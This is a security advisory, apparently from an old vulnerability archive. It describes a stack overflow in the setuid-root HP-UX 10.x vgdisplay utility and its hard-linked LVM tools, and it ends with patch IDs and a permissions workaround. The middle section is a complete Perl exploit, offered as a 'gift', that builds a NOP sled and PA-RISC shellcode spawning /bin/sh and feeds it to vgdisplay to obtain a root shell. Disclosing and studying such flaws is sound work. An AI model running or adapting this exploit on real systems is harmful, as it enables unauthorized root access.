COMMAND
/usr/sbin/vgdisplay
SYSTEMS AFFECTED
HpUX 10.x
PROBLEM
Due to insufficient bounds checking on arguments which are
supplied by users, it is possible to overwrite the internal stack
space of the vgdisplay program while it is executing. By
supplying a carefully designed argument to the vgdisplay program,
intruders may be able to force vgdisplay to execute arbitrary
commands. As vgdisplay is setuid root, this may allow intruders
to run arbitrary commands with root privileges.
Note that many of the LVM utility programs are hard links to
vgdisplay. This indicates that these utility programs share the
same code with vgdisplay, and may also be subject to similar
attacks.
The following programs are all hard links: lvchange, lvcreate,
lvdisplay, lvextend, lvlnboot, lvreduce, lvremove, lvrmboot,
pvchange, pvcreate, pvdisplay, pvmove, vgcfgbackup, vgcfgrestore,
vgchange, vgcreate, vgdisplay, vgexport, vgextend, vgimport,
vgreduce, vgremove, vgscan.
Scriptors of Doom and their guests have following gift for those
working on HpUX.
#!/usr/contrib/bin/perl
sub h2cs {
local($stuff)=@_;
local($rv);
while($stuff !~ /^$/) {
$bob=$stuff;
$bob =~ s/^(..).*$/$1/;
$stuff =~ s/^..//;
#$rv.=chr(oct("0x${bob}"));
$rv.=sprintf("%c",oct("0x${bob}"));
}
return $rv;
}
open(PIPE,"uname -r|");
chop($rev=<PIPE>);
close(PIPE);
$rev =~ s/^.*\.(.*)\..*$/$1/;
if ($rev eq "10") {
$offset=0;
$prealign="a"x1071;
$postalign=""; # 0 byte post
$pcoq=&h2cs("7b03be03");
} else {
$offset=2170; # 2170 works for 9.X...
$prealign=""; # zero byte pre
$postalign="PP"; # 2 byte post
$pcoq=&h2cs("7b033018");
}
$nop=&h2cs("08210280");
$code="";
#$code.=&h2cs("02233210"); # Opcode o' Death...
$code.=&h2cs("34160506"); # LDI 643,r22
$code.=&h2cs("96d60534"); # SUBI 666,r22,r22
$code.=&h2cs("20200801"); # LDIL L%0xc0000004,r1
$code.=&h2cs("e420e008"); # BLE 4(sr7,r1)
$code.=&h2cs("0b5a029a"); # XOR arg0,arg0,arg0
$code.=&h2cs("e83f1ffd"); # BL .+8,r1
$code.=&h2cs("08210280"); # NOP
$code.=&h2cs("34020102"); # LDI 129,rp
$code.=&h2cs("08410402"); # SUB r1,rp,rp
$code.=&h2cs("60400162"); # STB r0,177(rp)
$code.=&h2cs("b45a0154"); # ADDI 170,rp,arg0
$code.=&h2cs("0b390299"); # XOR arg1,arg1,arg1
$code.=&h2cs("0b180298"); # XOR arg2,arg2,arg2
$code.=&h2cs("341604be"); # LDI 607,r22
$code.=&h2cs("20200801"); # LDIL L%0xc0000004,r1
$code.=&h2cs("e420e008"); # BLE 4(sr7,r1)
$code.=&h2cs("96d60534"); # SUB 666,r22,r22
$code.=&h2cs("deadcafe"); # Illegal instruction -- dump core if exec fails
$data="/bin/sh."; # Data stuff
for $k (keys %ENV) {
delete $ENV{"$k"}; }
$codedata=$code.$data;
$num=int(($offset-length($code)-length($data)-4)/4);
$num=64;
$pre="$nop"x$num;
$of=$prealign.$pcoq;
$of.=$pre.$code.$data;
exec("/usr/sbin/vgdisplay","$of");
SOLUTION
Remove setuid and non-root execute permissions if you wish not to
install patches. Sites will need to restrict permissions on both
the dynamically linked copies in /usr/sbin and the statically
linked copies in /sbin. For those who will apply patch, these
are their IDs:
PHCO_10048 on all platforms with HP-UX releases 10.20,
PHCO_10059 on all platforms with HP-UX releases 10.10,
PHCO_10060 on all platforms with HP-UX releases 10.01,
PHCO_10061 on all platforms with HP-UX releases 10.00,
PHCO_10052 on all platforms with HP-UX releases 10.24.
NOTE: HP-UX release 9.X is not affected. All patches are
available now.